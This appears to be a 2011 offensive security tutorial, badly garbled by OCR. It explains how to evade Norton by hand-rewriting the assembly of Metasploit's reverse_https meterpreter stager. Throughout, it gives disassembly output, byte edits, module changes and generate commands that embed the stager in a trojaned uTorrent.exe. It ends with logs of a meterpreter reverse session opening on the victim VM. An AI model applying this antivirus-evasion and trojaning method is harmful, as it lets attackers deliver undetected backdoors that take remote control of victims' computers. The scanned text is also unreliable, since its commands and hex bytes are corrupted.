Evading  Antimalware  Engines  via  Assembly  Ghostwriting 
- 2011  sep  - by  antiordinary  - 


In  this  operation  we'll  neutralize  an  antivirus  deployment  by  manually  rewriting  the 
assembly  code  for  an  exploit  payload  before  launching  our  attack.  With  deep  respect  to 
the  cleverboots  malware  analysts  responsible  for  the  sig  dbs  which  keep  folks  safe, 
signature-baesd  a/v  is  no  longer  an  effective  solution.  Even  modern  heuristics  engines 
are  susceptible  to  obfuscations  on  the  assembly  level,  as  shown. 

The  technique  we'll  be  using  can  apply  to  any  executable  which  needs  to  slip  past  a 
signature-based  scanner.  To  make  things  a smidge  more  interesting  we'll  be  building  our 
backdoor  with  the  Metasploit  Framework  and  injecting  it  with  one  of  the  most  fun  and 
easily-recognizable  payloads  I could  think  of:  windows/meterpreter/reverse  https.  The 
antivirus  vendors  are  watching  MSF  like  a hawk,  of  course,  and  for  good  reason.  Any  a/v 
that  takes  itself  seriously  will  have  meterpreter  stager  signatures. 

This  is  a VM  named  Atbash.  It's  running  Windows  7 and  Norton  Antivirus,  which  is 
subsequently  in  charge  of  Atbash' s antivirusing  needs.  Why  Norton?  It's  common.  Also 
because  McAfee  wouldn't  detect  the  unmodified  reverse_https  stager  payload,  let  alone  our 
permutations . 


Atbash,  Norton,  and  the  Metasploit  reverse  https  handler. 


Our  backdoor  is  a copy  of  uTorrent.exe  taken  from  Atbash  and  augmented  with  the  stock 
https  stager.  Norton  pounces  on  it  at  once  as  a proper  antivirus  engine  should.  In  fact 
Norton  makes  a rather  decent  job  of  it,  electing  to  scrub  the  executable  down  and 
maintain  its  usefulness  rather  than  delete  it  outright. 


Thus  the  stock  reverse_https  stager  is  generally  doomed  to  fail.  For  all  its  elegance, 
it's  ubiquitous,  and  therefore  in  many  scenarios  it's  as  subtle  as  a brick.  Our  fix  is  to 
ignore  the  executable  and  instead  adapt  the  framework  directly.  The  reverse_https  stager 
payload  is  x86  assembly  wrapped  in  ruby  and  plugged  into  the  framework.  By  rewriting  the 
assembly  and  tweaking  the  ruby  to  match,  we  can  wreck  the  antivirus  fingerprint  and  add 
signature  evasion  capabilities  to  our  local  copy  of  the  MSF. 

Start  by  extracting  the  shellcode  from  msf's  stock  reverse_https  stager.  Copy  the 
original  stager  as  a new  file  for  us  to  modify,  then  open  them  both  in  your  favorite 
editor  (be  sure  your  editor  has  write  access  to  the  new  file) . 


[rtylerSgallifrey  windows] $ pwd 

/opt/f ramework-4 . 0 . 0/msf 3/modul es/payl oads/stagers/wi ndows 
[rty]er@ga]]ifrey  wi ndows] $ Is  | grep  https 
reverse_https . rb 
reverse_https_strai nA. rb 


udis86  is  a work  of  art.  It's  an  x86  and  x86_64  dissassembler  that  we'll  be  using  to 
guide  us  in  our  adventures.  Install  it  if  you  haven't  already.  Next  we  need  a work 
directory  with  two  workspaces. 


>ty]er@ga]]ifrey  sigevasion_l]$  mkdi r asm 

,rty]er@ga]]ifrey  sigevasion_l]$  cd  asm 

rty]er@ga]]ifrey  asm 

$ touch  msf_rhttps 

rty]er@qa]]ifrey  asm' 

$ touch  strai nA_https 

,rty]er@ga]]ifrey  asm. 

$ gedit  msf_rhttps  &&  gedit  strai nA_https 

Toss  the  original  binary  payload  into  the  workspaces  and  perform  some  f ind-and-replaces 
to  get  rid  of  everything  that  isn't  hexadecimal.  Be  sure  to  replace  all  the  gaps  between 


bytes  with  spaces  so  udis86  will  understand.  You  should  end  up  with  a block  of  8-bit  hex 
separated  by  spaces.  This  is  your  control.  Disassemble  it  in  a terminal  to  see  what  we've 
got . 


>tyler@gallifrey  asm]$  diff  msf_rhttps 
>tyler@gallifrey  asm]$  cat  msf_rhttps 
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[rty1er@ganifrey  asm]$  udcii 
0000000000000000  fc 
0000000000000001  6889000000 
0000000000000006  60 
0000000000000007  89e5 
0000000000000009  31d2 
000000000000000b  64865230 
OOOOOOOOOOOOOOOf  8b520c 
[...] 

0000000000000154  8b07 
0000000000000156  01c3 
0000000000000158  85c0 
000000000000015a  75e5 
000000000000015c  58 
000000000000015d  c3 
0000000000000156  6851ffffff 


-X  msf_rhttps 
cld 

call  0x8f 
pushad 

mov  6bp,  6sp 

xor  6dx,  6dx 

mov  6dx,  [fs : 6dx+0x30] 

mov  6dx,  [6dx+0xc] 

mov  6ax,  [6di] 
add  6bx,  6ax 
t6St  6ax,  6ax 
jnz  0x141 
pop  6ax 
T6t 

call  0xb4 


The  stager's  a/v  signature  is  likely  to  be  buried  somewhere  in  here.  This  isn 
monolith  PE  we're  modifying,  it's  only  about  350  bytes  of  asm.  That  means  the 
probably  fragile.  Go  crazy.  Smash  stuff.  We'll  start  with  something  simple: 


t some 
sig  is 


[rtyler@gallifrey  asm]$  udcli 
0000000000000000  fc 
0000000000000001  6889000000 
0000000000000006  60 
0000000000000007  89e5 
0000000000000009  31d2 
000000000000000b  64865230 
OOOOOOOOOOOOOOOf  8b520c 
0000000000000012  865214 


[rtyler@gallifrey  asm]$  udcli 
0000000000000000  fc 
0000000000000001  e88c000000 
0000000000000006  60 
0000000000000007  8bc2 
0000000000000009  33dO 
000000000000000b  89e5 
OOOOOOOOOOOOOOOd  64865230 
0000000000000011  8b520c 
0000000000000014  90 
0000000000000015  8b5214 


-X  msf_rhttps 
cid 

call  0x8f 
pushad 

mov  ebp,  esp 
xor  edx,  edx 

mov  edx,  [fs : edx+0x30] 
mov  edx,  [edx+Oxc] 
mov  edx,  [edx+0xl4] 


-X  strainA_https 
cld 

call  0x92 
pushad 

mov  eax,  edx 
xor  edx,  eax 
mov  ebp,  esp 

mov  edx,  [fs : edx+0x30] 
mov  edx,  [edx+Oxc] 

nop 

mov  edx,  [edx+0xl4] 


Let's  find  out  if  this  is  enough  to  fool  Norton.  (Golly,  I hope  not.)  If  you  haven't  set 
up  shares  on  your  VM  and  mounted  them,  now's  a great  time.  We'll  need  a few  tweaks  to  the 
StrainA  msf  module  to  use  it  properly  in  the  framework.  We  also  need  to  increment  the 
LPORT  offset  to  193  since  we  added  3 bytes  before  that  point  in  the  code.  Like  so: 


module  Metasploit3 

include  Msf :: Payload : 

: Stager 

include  Msf :: Payload : 

: Windows 

def 

self. handler  type 

alias 

"reverse  https 

StrainA" 

end 

def 

initialize (info  = 

{ }) 

super (merge  info (info. 

' Name ' 

=>  'Reverse  HTTPS  Stager  StrainA', 

L • • • J 

'LPORT'  =>  [ 193, 

'V  ], 

Plug  the  revised  shellcode  into  the  StrainA  module  file.  Then  open  up  your  msfconsole  and 
check  that  our  new  strain  has  loaded  properly.  Use  it,  configure  it,  and  roll  it  into  a 
new  copy  of  uTorrent.exe.  Be  sure  to  do  the  same  for  the  stock  stager  to  give  us  a 
control . 


msf  > search  reverse_https 
Matching  Modules 


Name  Rank  Description 


payload/windows/meterpreter/reverse_https  [■  ■ ■] 

payload/windows/meterpreter/reverse_https_strai nA  [.  . .] 

msf  > pwd 
[*]  exec:  pwd 

/medi a/atbash 
msf  > Is 
[*]  exec:  Is 

uTorrent . exe 
NAVDownl oader . exe 
Norton  installation  Files. Ink 
desktop . i ni 

msf  > use  payload/windows/meterpreter/reverse_https 

msf  payload (reverse_https)  > set  Ihost  192.168.56.1 
Ihost  =>  192.168.56.1 

msf  payload (reverse_https)  > set  Iport  5000 

Iport  =>  5000 

msf  payload (reverse_https)  > generate  -e  x86/shi kata_ga_nai  -i  7 -x 
/medi a/atbash/uTor rent. exe  -k  -t  exe  -f  /medi a/atbash/uTorrent_strainA. exe 

[*]  writing  639488  bytes  to  /medi a/atbash/uTorrent_strai nA. exe .. . 


Faced  with  our  trivial  Strain  A modifications,  Norton  sounds  the  alarm  immediately, 
can  confirm  that  strainA  is  functioning  properly  if  we  disable  the  on-access  scanner. 


Oracle  VM  VirtualBox 


[ svn  rl3722  updated  today  (2011.09.' 

i-?.f  > use  windows/meterpreter/reverse_https 
i[iif  payload(rever  _httf  -)  > show  options 

f'lodule  options  (payload/windows/meterpreter,  RecycleBin  uTot 

Name  Current  Setting  Required  Desc- 


EXITFUNC  process 
LHOST 

LPORT  8443 


Exit 

The 

The 


iii>f  payload(t .)  > set  Ihost  192. 

Ihost  =>  192.168.56.1 

in^t  payload ( •)  > set  Iport  5000 
Iport  =>  5000 

m-^t  payload(iever‘  > generate  -e  x- 

1*1  Writing  639488  bytes  to  /media/atbash/uT 
iijii  payload(rever  - https)  > Is  /media/atba 
1*1  exec:  Is  /media/atbash 

l-riTtop.ini 
rjavDownloader  .exe 
fJrrton  Installation  Files. Ink 
ijTorrent.exe 

i-iTorrent_stockstager.exe 

in-ff  payload(i  . -_https)  > search  strainA 
Matching  Modules 


atbash  (with  Norton)  [Running]  - Oracle  VM  VirtualBox 


File  Insight 

File  Insight 

Help 

0 utorrent_straina.exe  (Trojan.Swrortiinf)  Locale  tins  tiie  ^ 


This  threat  has  been  removed. 
No  further  action  is  needed. 


Details 

Unknown  Community  usage.  Risk  High 


Fie:  c:\Users\zaphod\Desktop\utorTent_straina.exe 
Removed 


[Norton 

* by  bymanlec 


Potions  Leam  More 


payload/windows/mete rpreter/r eve rse_https_strainA 


normal  windows  Meterpreter  (ReTlective  Injection)^  Fteverse  HTTPS  Stager  StrainA 


iii>t  payload(:  ■ https)  > use  payload/windows/meterpreter/reverse_https_strainA 

[ii>t  payload ( I i v^r^  _https_--rainA)  > set  Ihost  192.168.56.1 
Ihii-t  =>  192.168.56.1 

ni-f.f  payload(  i - . - : _https_=traiiiA)  > set  Iport  5000 

Iport  =>  5000 

mst  payload (i  ever  • https_.- 1: -jinA)  > generate  -e  x86/shikata_ga_nai  -i  7 -x  /media/atbash/uTorrent.exe  -k  -t  exe  -f  /media/atbash/uTorrent_strainA.exe 
[*1  Writing  639488  bytes  to  /media/atbash/uTorrent_strainA.exe. . . 

1 payload(i _https_MrainA)  >[] 


Our  first  modest  modifications  in  StrainA  aren't  enough  for  a bypass. 


Chances  are  decent  that  somewhere  within  these  ~350  bytes  of  shellcode  is  the  thumbprint 
Norton  is  using  for  a signature.  This  can  be  a long  and  frustrating  stage.  Be  creative. 
Ghostwrite  the  assembly  code  by  swapping  registers,  switching  sequences,  segmenting 
operations,  or  anything  else.  So  long  as  the  code  remains  functional  when  the  dust 
settles,  it's  a step  towards  breaking  another  antivirus  vendor's  signature  set. 

It  will  be  necessary  to  write  custom  assembly  that  can  be  patched  into  the  existing 
shellcode.  There  are  resources  at  the  end  of  this  paper  for  anyone  who  doesn't  do  this 
sort  of  thing  on  a regular  basis,  udcli  is  fantastic  for  this,  acting  as  a translator  and 
an  error-checker.  For  example,  there's  a typo  in  the  fifth  byte  of  this  code: 


[rty1er@ganifrey  ~]$  echo  49  31  CO  31  AF  8b  34  8a  31  CO  AC  | udcli  -x 
0000000000000000  49  dec  ecx 

0000000000000001  31c0  xor  eax,  eax 

0000000000000003  31af8b348a31  xor  [edi+0x318a348b] , ebp 

0000000000000009  cOac  invalid 


And  repaired: 


[rtylerOgallifrey  ~]$  echo  49 

31  CO  31  FF 

8b  34  8b  31  CO  AC  | udcli  -x 

0000000000000000  49 

dec  ecx 

0000000000000001  31c0 

xor  eax 

eax 

0000000000000003  31ff 

xor  edi 

edi 

0000000000000005  8b348b 

mov  esi 

[ebx+ecx*4] 

0000000000000008  31c0 

xor  eax 

eax 

000000000000000a  ac 

lodsb 

I've  also  found  it  useful  to  write  a script  which  traces  asm  jumps  and  calls.  Unless 
modifications  to  the  assembly  happen  to  be  the  exact  same  length  as  the  code  they're 


replacing,  offsets  for  any  number  of  relative  references  will  need  to  be  adjusted.  This 
is  a similar  process  to  the  increments  and  decrements  to  this  payload's  LPORT  offset. 

Metasploit's  obfuscators  can  add  a welcome  dash  of  luck  to  the  exercise.  On  both  stock 
and  modified  versions  of  this  particular  payload,  I've  used  multiple  iterations  of 
shikata  ga_nai.  Most  of  the  better-known  antivirus  engines  are  undeterred  by  this.  Their 
signatures  are  based  on  unchanging  aspects  of  the  underlying  code.  However,  the  right 
obfuscation  in  the  right  place  can  augment  our  efforts  to  mutate  the  shellcode  manually. 

The  process  can  be  arduous,  but  spontaneity  and  creativity  are  powerful  tools.  When  the 
modified  stager  finds  itself  distorted  at  the  engine's  pressure  points,  there  will  be  no 
match  against  the  signature  database,  and  the  antivirus  engine  will  allow  the  malware  to 
run  unmolested. 


handler 


•say++ 


suppon » 


The  reverse_https  strainB  payload  successfully  bypasses  Norton's  full  protection . 


-]$  msf console  -r  handler 


metasploit 


W ® 

Recycle  Bin  uTorrent_st... 


atbash  (with  Norton)  [Running]  - Oracle  VM  VirtualBox 


Norton  AntiViruS  Systein  status:  Secure 


Custom  Scan 


=[  metasploit  v4.0.1-dev  [core:4.0 
=[  731  exploits  - 374  auxiliary  • 

=[  229  payloads  - 27  encoders  - 8 
=[  svn  rl3722  updated  today  (2011.' 


lOssUsei^Xzaphod 


resource  (handler)>  use  multi/handler 
resource  (handler}>  set  payload  windows/ii 

payload  =>  windows/meterpreter/reverse_ht'B^ ^ 

resource  (handler)>  Ihost  192. 168.56. 

Ihost  =>  192.168.56.1  H 

resource  (handler)>  set  Iport  5000  i:;\Usei*sNzaphod>«hoani 

Iport  =>  5000  E -t**ashx*«phod 

resource  (handler)>  exploit  B|  >-NU*«»**^«phod>^ 

(*J  Started  HTTPS  reverse  handler  on  http  ■■ 

[*]  Starting  the  payload  handler... 

[*1  192.168.56.101:49296  Request  received  B 
[*1  192.168.56.101:49296  Staging  connecti  B 
[*I  Patched  transport  at  offset  486516... 

[*]  Patched  URL  at  offset  486248...  B 

Patched  Communication  Timeout 

[*1  Meterpreter  session  1 opened  (192.168.56.1:5000  ->  ioti.  5b.  101 :4y.^»Dv  at  401 1- 


Atteeiton  Retrnired 


> Total  items  scanned: 


- 15:57:44  -o- v-u 


m‘rt-rDr-?t“r  > getuid 

S-rrver  username:  atbash\zaphod 

m-eterpryter  > sysinfo 


Architecture 
bystem  Language 
Myterpreter 

metyror-rtyr  > 


ATBASH 

Windows  7 (Build  7600). 

x86 

en_US 

x86/win32 


Worth  noting  is  strainB' s bypass  of  Norton's  heuristics  engine,  which  came  as  a nice 
surprise.  Raw  signature-based  evasion  was  my  only  target  for  this  operation.  Norton 
allowed  unquestioned  execution  of  the  modified  payload,  including  meterpreter  session 
establishment . 


2752 

2760 

2952 


cmd.exe 
conhost.exe 
:.-vc . exe 


x86 

x86 


atbash\zaphod 

atbashXzaphod 


C:  \Windows\system32\cind . exe 
C:\Window5\system32\conhost . exe 


»ppi^vc , exe 


hod  C: \Users\zaphod\Desktop\uTo Trent  strainB.exe 


1552 

cmd.exe 

x86 

1 

atbashXzaphod 

C:  XWindowsXsystem32Xcmd . exe 

1724 

conhost.exe 

x86 

1 

atbashXzaphod 

C: XWindowsXsystem32Xconhost . exe 

684 

Navw32. exe 

x86 

1 

C: XPR0GRA'lXN0PCT0N-2XEngineX1860~l , 29Xnavw32, exe 

2568 

cmd.exe 

x86 

1 

atbashXzaphod 

C: XWindowsXsystem32Xcmd . exe 

552 

conhost.exe 

x86 

1 

atbashXzaphod 

C: XWindowsXsystem32Xconhost . exe 

> sysinfo 


•niputer 


r :hitecture 
ystem  Language 
“terpreter 


ATBASH 

Windows  7 (Build  7600). 

x86 

en_US 

x86/win32 


-t-rcT-t-r  > getuid 
-Tver  username:  atbashXzaphod 
Tt-r-rr-t-r  > getpid 
urrent  pid:  736 
“t.-r-[.’rrt“r  > background 
if  exploitd'  ‘ I ) > sessions 


tive  sessions 


Id  Type  Information  Connection 

1 meterpreter  x86/win32  atbashXzaphod  % ATBASH  192.168.56.1:5000  •>  192,168.56.101:49296 


|ni'?f  exploit (Itrjndlfr)  > sessions  -i  1 
(*1  Starting  interaction  with  1... 


rr-f  r -rt“  r > Is 


Listing:  CiXUsersXzaphodXDesktop 


Mode 

Size 

Type 

Last  modified 

Name 

TCLLT  r-xr-xr-x 

0 

dir 

2011-09-13 

15:55 

lOl  -0700 

40~77/rwx rwx rwx 

0 

dir 

2011-09-13 

15:04 

;08  -0700 

100777/rwx rwx rwx 

397864 

fil 

2011-09-13 

13:18 

:00  -0700 

NAVDownloader.exe 

100666/rw-rw-rw- 

1265 

fil 

2011-09-13 

13:19:53  -0700 

Norton  Installation  Files, 

100666/rv-rw-rv- 

282 

fil 

2011-09-09 

08:59:33  -0700 

desktop.ini 

100777/rwx rwx rwx 

640888 

fil 

2011-09-09 

20:34 

:54  -0700 

uTorrent.exe 

100777/rwx rwx rwx 

635392 

fil 

2011-09-13 

15:45:40  -0700 

uTorrent  stockstager.exe 

100777/rwx rwx rwx 

635392 

fil 

2011-09-13 

15:49:57  -0700 

uTorrent  strainA.exe 

100777/rwx rwx rwx 

639488 

fil 

2011-09-13 

15:55:01  -0700 

uTorrent_strainB.exe 

-t-r-pr-t-r 


Flexing  meterpreter ' s muscles . 


Good  hunting. 


Resources : 

- metasploit  framework  4.0.0/.1 

- free  trial  of  target  antivirus  software 

- udis86:  http://udis86.sourceforge.net/ 

- x86  assembly  references.  Some  suggestions  (if  needed) : 

http://ref.x86asm.net/ 

http : / / WWW . c- j ump . com/ CIS7  7 / reference /I ns t rue tions_by_Mnemonic . html 
http : / / WWW . c- j ump . com/ CIS77/CPU/ x8  6 /lecture . html 

- oracle  virtualbox 


